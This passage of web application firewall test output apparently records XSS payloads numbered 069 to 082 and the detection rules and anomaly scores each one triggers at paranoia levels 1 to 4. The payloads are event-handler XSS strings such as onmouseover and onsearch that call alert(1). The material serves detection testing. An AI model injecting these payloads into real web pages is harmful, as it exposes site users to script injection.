942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-069 ********
Payload:
payload=<a onmouseleave="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-070 ********
Payload:
payload=<a onmousemove="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-071 ********
Payload:
payload=<a onmouseout="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-072 ********
Payload:
payload=<a onmouseover="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-073 ********
Payload:
payload=<a onmouseup="alert(1)">test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 61
****** payload-074 ********
Payload:
payload=<a onpaste="alert(1)" contenteditable>test</a></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
****** payload-075 ********
Payload:
payload=<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-076 ********
Payload:
payload=<form onreset=alert(1)><input type=reset></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-077 ********
Payload:
payload=<form><input type=search onsearch=alert(1) value="Hit return" autofocus></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-078 ********
Payload:
payload=<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-079 ********
Payload:
payload=<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-080 ********
Payload:
payload=<input onselect=alert(1) value="XSS" autofocus></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
****** payload-081 ********
Payload:
payload=<form onsubmit=alert(1)><input type=submit></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-082 ********
Payload:
payload=<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
